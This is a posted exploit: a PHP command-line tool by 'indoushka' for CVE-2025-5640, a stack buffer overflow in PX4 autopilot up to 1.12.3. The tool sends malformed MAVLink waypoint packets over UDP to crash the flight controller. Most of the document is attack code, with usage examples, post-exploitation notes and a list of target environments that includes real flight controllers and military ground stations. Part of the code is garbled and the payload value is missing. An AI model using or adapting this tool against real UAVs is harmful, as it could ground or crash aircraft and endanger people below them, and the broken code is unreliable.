============================================================================================================================================= | # Title : PX4 Military UAV Autopilot 1.12.3 Remote DoS Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://docs.px4.io/v1.12/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/202894/ & CVE-2025-5640 [+] Summary : This PoC exploits a Stack-Based Buffer Overflow vulnerability in PX4 Military UAV Autopilot versions up to 1.12.3, allowing an attacker to send a poorly formatted MAVLink message of type: TRAJECTORY_REPRESENTATION_WAYPOINTS to cause a complete failure (Denial of Service) of the UAV's autopilot. The PoC works by sending a malicious MAVLink payload via UDP to the common control port (14540–14550). Receiving data exceeding the expected size overwrites the stack memory, causing the autopilot to malfunction and the aircraft to enter Failsafe mode or lose connectivity entirely. [+] POC : php poc.php targetIp = $ip; $this->targetPort = $port; $this->timeout = $timeout; $this->verbose = $verbose; } public function run($mode = "dos") { $this->showBanner(); try { switch ($mode) { case "check": $this->checkConnection(); break; case "dos": $this->executeDos(); break; default: $this->error("Unknown mode: $mode"); return; } } catch (Exception $e) { $this->error("Execution failed: " . $e->getMessage()); } } private function checkConnection() { $this->info("Testing connection to PX4 autopilot..."); $this->info("Target: {$this->targetIp}:{$this->targetPort}"); // Create UDP socket $socket = $this->createUdpSocket(); if (!$socket) { $this->error("Failed to create UDP socket"); return; } // Send heartbeat check $heartbeat = $this->createMavlinkHeartbeat(); $result = socket_sendto($socket, $heartbeat, strlen($heartbeat), 0, $this->targetIp, $this->targetPort); if ($result === false) { $this->error("Failed to send heartbeat"); } else { $this->info("Heartbeat sent successfully"); // Wait for response socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array('sec' => $this->timeout, 'usec' => 0)); $response = ''; $from = ''; $port = 0; $bytes = socket_recvfrom($socket, $response, 1024, 0, $from, $port); if ($bytes > 0) { $this->success("PX4 autopilot is responsive! Received $bytes bytes from $from:$port"); $this->info("Connection test PASSED"); } else { $this->warning("No response received - PX4 may be offline or not listening"); } } socket_close($socket); } private function executeDos() { $this->warning("🚨 LAUNCHING DENIAL OF SERVICE ATTACK 🚨"); $this->info("Target: {$this->targetIp}:{$this->targetPort}"); $this->info("This will crash the PX4 autopilot if vulnerable"); // Countdown for ($i = 5; $i > 0; $i--) { $this->info("Sending exploit in $i seconds... (Ctrl+C to abort)"); sleep(1); } $socket = $this->createUdpSocket(); if (!$socket) { $this->error("Failed to create UDP socket for attack"); return; } // Convert hex payload to binary $payload = hex2bin($this->hexPayload); if (!$payload) { $this->error("Failed to decode hex payload"); socket_close($socket); return; } $this->info("Sending malformed MAVLink packet..."); // Send multiple packets for reliability $packetsSent = 0; for ($i = 0; $i < 3; $i++) { $result = socket_sendto($socket, $payload, strlen($payload), 0, $this->targetIp, $this->targetPort); if ($result === false) { $this->error("Failed to send packet #" . ($i + 1)); } else { $this->info("Packet #" . ($i + 1) . " sent successfully ($result bytes)"); $packetsSent++; } usleep(100000); // 100ms delay between packets } socket_close($socket); if ($packetsSent > 0) { $this->success("Exploit packets delivered successfully"); $this->warning("PX4 autopilot should crash if vulnerable to CVE-2025-5640"); $this->showPostExploitationInfo(); } else { $this->error("No packets were sent successfully"); } } private function createUdpSocket() { $socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP); if ($socket === false) { return false; } // Set socket options socket_set_option($socket, SOL_SOCKET, SO_REUSEADDR, 1); socket_set_option($socket, SOL_SOCKET, SO_SNDTIMEO, array('sec' => $this->timeout, 'usec' => 0)); return $socket; } private function createMavlinkHeartbeat() { // Simple MAVLink heartbeat message (system ID 255, component ID 0) $heartbeat = hex2bin("fe09000000ff0000000000000000000000000203d403"); return $heartbeat ?: ''; } private function showPostExploitationInfo() { $this->info(" 📊 POST-EXPLOITATION ACTIONS: ────────────────────────────────────────────────── 1. Monitor UAV Status: â€ĸ Check if autopilot stopped responding â€ĸ Verify telemetry data interruption â€ĸ Observe flight controller behavior 2. Impact Assessment: â€ĸ Autopilot crash = UAV may enter failsafe mode â€ĸ Possible flight termination in worst case â€ĸ Ground station connection loss 3. Recovery Actions: â€ĸ Restart PX4 software â€ĸ Reboot flight controller â€ĸ Re-establish MAVLink connections 🛡ī¸ MITIGATION RECOMMENDATIONS: â€ĸ Update PX4 to version > 1.12.3 â€ĸ Implement MAVLink message validation â€ĸ Use message authentication â€ĸ Network segmentation for UAV communications "); } private function showBanner() { echo " ┌─────────────────────────────────────────────────────────────┐ │ PX4 UAV AUTOPILOT EXPLOIT │ │ CVE-2025-5640 - Remote DoS Exploit │ │ │ │ Target: PX4 Military UAV Autopilot <= 1.12.3 │ │ Vulnerability: Stack-based Buffer Overflow │ │ Impact: Denial of Service (Autopilot Crash) │ │ Author: indoushka │ │ PHP Implementation │ └─────────────────────────────────────────────────────────────┘\n\n"; } private function info($message) { echo "ℹī¸ [INFO] " . $message . "\n"; } private function success($message) { echo "✅ [SUCCESS] " . $message . "\n"; } private function warning($message) { echo "⚠ī¸ [WARNING] " . $message . "\n"; } private function error($message) { echo "❌ [ERROR] " . $message . "\n"; } } function showHelp() { echo " 📖 PX4 UAV Autopilot DoS Exploit (CVE-2025-5640) ────────────────────────────────────────────────── 🛠ī¸ Usage: php px4_exploit.php [OPTIONS] 📋 Options: --ip Target IP address (default: 127.0.0.1) --port Target UDP port (default: 14540) --mode Operation mode: dos, check (default: dos) --timeout Timeout in seconds (default: 5) --help Show this help information đŸŽ¯ Examples: # Check connection to PX4 php px4_exploit.php --mode check --ip 192.168.1.100 --port 14550 # Launch DoS attack php px4_exploit.php --mode dos --ip 192.168.1.100 --port 14550 # Attack local SITL instance php px4_exploit.php --mode dos ⚠ī¸ LEGAL DISCLAIMER: This tool is for authorized security testing only. Do not use against systems you don't own or have permission to test. Military UAV systems are critical infrastructure. Unauthorized access may violate national and international laws. 🔧 Technical Details: â€ĸ Vulnerability: Buffer overflow in MAVLink message handling â€ĸ Affected: PX4 Autopilot <= 1.12.3 â€ĸ Protocol: MAVLink over UDP â€ĸ Port: Typically 14540-14550 â€ĸ Impact: Autopilot crash → UAV failsafe/termination đŸŽ¯ Target Environments: â€ĸ PX4 SITL (Software In The Loop) â€ĸ Real PX4 flight controllers â€ĸ Military UAV ground control stations â€ĸ Drone testing laboratories \n"; } function parseArguments($argv) { $options = [ 'ip' => '127.0.0.1', 'port' => 14540, 'mode' => 'dos', 'timeout' => 5, 'help' => false ]; for ($i = 1; $i < count($argv); $i++) { switch ($argv[$i]) { case '--ip': $options['ip'] = $argv[++$i] ?? '127.0.0.1'; break; case '--port': $options['port'] = intval($argv[++$i] ?? 14540); break; case '--mode': $options['mode'] = $argv[++$i] ?? 'dos'; break; case '--timeout': $options['timeout'] = intval($argv[++$i] ?? 5); break; case '--help': $options['help'] = true; break; } } return $options; } // Main execution if (php_sapi_name() !== 'cli') { die("❌ This script must be run from command line\n"); } $options = parseArguments($argv); if ($options['help']) { showHelp(); exit(0); } // Validate mode if (!in_array($options['mode'], ['dos', 'check'])) { echo "❌ Invalid mode. Use 'dos' or 'check'\n"; showHelp(); exit(1); } // Validate IP address if (!filter_var($options['ip'], FILTER_VALIDATE_IP)) { echo "❌ Invalid IP address: {$options['ip']}\n"; exit(1); } // Validate port if ($options['port'] < 1 || $options['port'] > 65535) { echo "❌ Invalid port number: {$options['port']}\n"; exit(1); } try { $exploit = new PX4UAVExploit( $options['ip'], $options['port'], $options['timeout'], true ); $exploit->run($options['mode']); } catch (Exception $e) { echo "❌ Fatal error: " . $e->getMessage() . "\n"; exit(1); } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================